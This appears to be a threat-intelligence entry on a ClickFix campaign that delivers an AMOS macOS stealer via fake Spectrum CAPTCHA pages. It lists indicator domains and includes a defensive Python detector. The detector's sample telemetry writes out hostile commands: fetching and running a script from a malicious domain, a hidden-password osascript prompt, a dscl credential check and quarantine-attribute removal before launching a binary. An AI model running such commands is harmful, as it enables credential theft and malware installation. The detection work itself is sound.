AMOS Variant Distributed Via ClickFix In Spectrum-Themed Dynamic Delivery Campaign By Russian-Speaking Hackers

June 4, 2025, 8:46 p.m.

Description

A campaign using typo-squatted 'Spectrum' domains has been uncovered spreading a new Atomic macOS Stealer (AMOS) variant. The lure is a fake CAPTCHA verification page (the ClickFix technique) that serves a different payload depending on the victim's operating system. macOS visitors are told to run a shell script that harvests the user's system password and downloads an AMOS variant; the script relies only on native macOS commands to collect credentials, sidestep built-in protections, and execute the downloaded binary. Russian-language comments in the source code point to Russian-speaking operators. The delivery sites contain logic errors, suggesting the campaign was assembled hastily. The attack is cross-platform social engineering aimed at both consumer and corporate users, and fits a broader rise in multi-platform threats.
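The behaviours the description lists (a fetched script run with native macOS tools, a credential prompt, a protection bypass before the stealer runs) and the domain indicators below map directly onto telemetry most defenders already collect. The following Python is an added example, not code from the original report or from its source: the IOC list is the page's, while the command-line patterns, the event format and the sample telemetry are assumptions chosen to represent that behaviour.

```python
"""Detection helpers for the ClickFix/AMOS activity described above.

Added example, not code from the original report or its source. The four
domains are the page's indicators; the command-line patterns, the event
format and the sample events are assumptions chosen to represent the
behaviour the report describes (fetch-and-execute with native macOS
tools, credential harvesting, protection bypass).
"""
import re
from dataclasses import dataclass

# Indicators listed on the page.
IOC_DOMAINS = frozenset({
    "spectrum-ticket.net",
    "rugmel.cat",
    "panel-spectrum.net",
    "applemacios.com",
})

# Assumed command-line forms of the behaviours the report describes. These
# are representative ClickFix/AMOS tradecraft, not commands quoted from it.
BEHAVIOUR_PATTERNS = {
    # curl/wget output piped straight into a shell
    "fetch_and_pipe_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # sh -c "$(curl ...)": fetched script executed via command substitution
    "shell_of_fetched_content": re.compile(
        r'\b(ba|z)?sh\s+-c\s+["\']?\$\(\s*(curl|wget)\b'),
    # AppleScript dialog with a hidden (password) answer field
    "osascript_password_prompt": re.compile(
        r"\bosascript\b.*display dialog.*hidden answer", re.I),
    # local password check against Directory Services
    "password_validation": re.compile(r"\bdscl\b.*-authonly\b"),
    # stripping the quarantine attribute so Gatekeeper does not intervene
    "quarantine_removal": re.compile(
        r"\bxattr\b.*(com\.apple\.quarantine|\s-c\b)"),
}

_URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


@dataclass
class Finding:
    ts: str
    host: str
    reason: str
    detail: str


def matches_ioc_domain(name: str) -> bool:
    """True for an IOC domain or any subdomain of one."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in IOC_DOMAINS)


def classify_command(cmd: str) -> list[str]:
    """Names of every behaviour pattern (and IOC URL) found in a command line."""
    reasons = [name for name, pat in BEHAVIOUR_PATTERNS.items() if pat.search(cmd)]
    if any(matches_ioc_domain(h) for h in _URL_HOST.findall(cmd)):
        reasons.append("ioc_domain_in_url")
    return reasons


def analyze(events: list[dict]) -> list[Finding]:
    """Check DNS events against the IOC list and process events against the patterns."""
    findings = []
    for ev in events:
        if ev["type"] == "dns" and matches_ioc_domain(ev["qname"]):
            findings.append(Finding(ev["ts"], ev["host"], "ioc_domain_dns", ev["qname"]))
        elif ev["type"] == "process":
            for reason in classify_command(ev["cmd"]):
                findings.append(Finding(ev["ts"], ev["host"], reason, ev["cmd"]))
    return findings


def hosts_with_chain(findings: list[Finding], min_reasons: int = 2) -> dict[str, list[str]]:
    """Hosts showing several distinct reasons, i.e. more than one step of the chain."""
    by_host: dict[str, set[str]] = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.reason)
    return {h: sorted(r) for h, r in by_host.items() if len(r) >= min_reasons}


# Constructed sample telemetry (DNS queries and process launches), not real data.
SAMPLE_EVENTS = [
    {"ts": "2025-06-04T19:10:02Z", "type": "dns", "host": "mac-07", "qname": "spectrum-ticket.net"},
    {"ts": "2025-06-04T19:10:03Z", "type": "dns", "host": "mac-07", "qname": "cdn.applemacios.com"},
    {"ts": "2025-06-04T19:10:05Z", "type": "process", "host": "mac-07",
     "cmd": 'bash -c "$(curl -fsSL https://applemacios.com/s.sh)"'},
    {"ts": "2025-06-04T19:10:06Z", "type": "process", "host": "mac-07",
     "cmd": "osascript -e 'display dialog \"System Update\" default answer \"\" with hidden answer'"},
    {"ts": "2025-06-04T19:10:09Z", "type": "process", "host": "mac-07",
     "cmd": "dscl . -authonly alice Passw0rd!"},
    {"ts": "2025-06-04T19:10:11Z", "type": "process", "host": "mac-07",
     "cmd": "xattr -d com.apple.quarantine /tmp/Installer && chmod +x /tmp/Installer && /tmp/Installer"},
    {"ts": "2025-06-04T19:12:40Z", "type": "dns", "host": "mac-03", "qname": "rugmel.cat"},
    {"ts": "2025-06-04T19:13:01Z", "type": "process", "host": "mac-12",
     "cmd": "curl -sS https://example.org/health | jq ."},                                      # benign
    {"ts": "2025-06-04T19:13:02Z", "type": "dns", "host": "mac-12", "qname": "www.spectrum.com"},  # legitimate brand domain
]

if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.ts} {f.host:<7} {f.reason:<26} {f.detail}")
    print("hosts with multi-step chain:", hosts_with_chain(found))
```

Running the block prints each match and the hosts on which more than one distinct step fired. A single DNS query for one of the listed domains is already worth triage on its own; the chain threshold matters for the behaviour-only patterns, which can also fire on legitimate administration scripts that pipe installers into a shell or clear quarantine attributes.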

Date

  • Created: June 4, 2025, 7:24 p.m.
  • Published: June 4, 2025, 7:24 p.m.
  • Modified: June 4, 2025, 8:46 p.m.

Indicators

  • spectrum-ticket.net
  • rugmel.cat
  • panel-spectrum.net
  • applemacios.com

Attack Patterns

Additional Information

  • Telecommunications
  • United States of America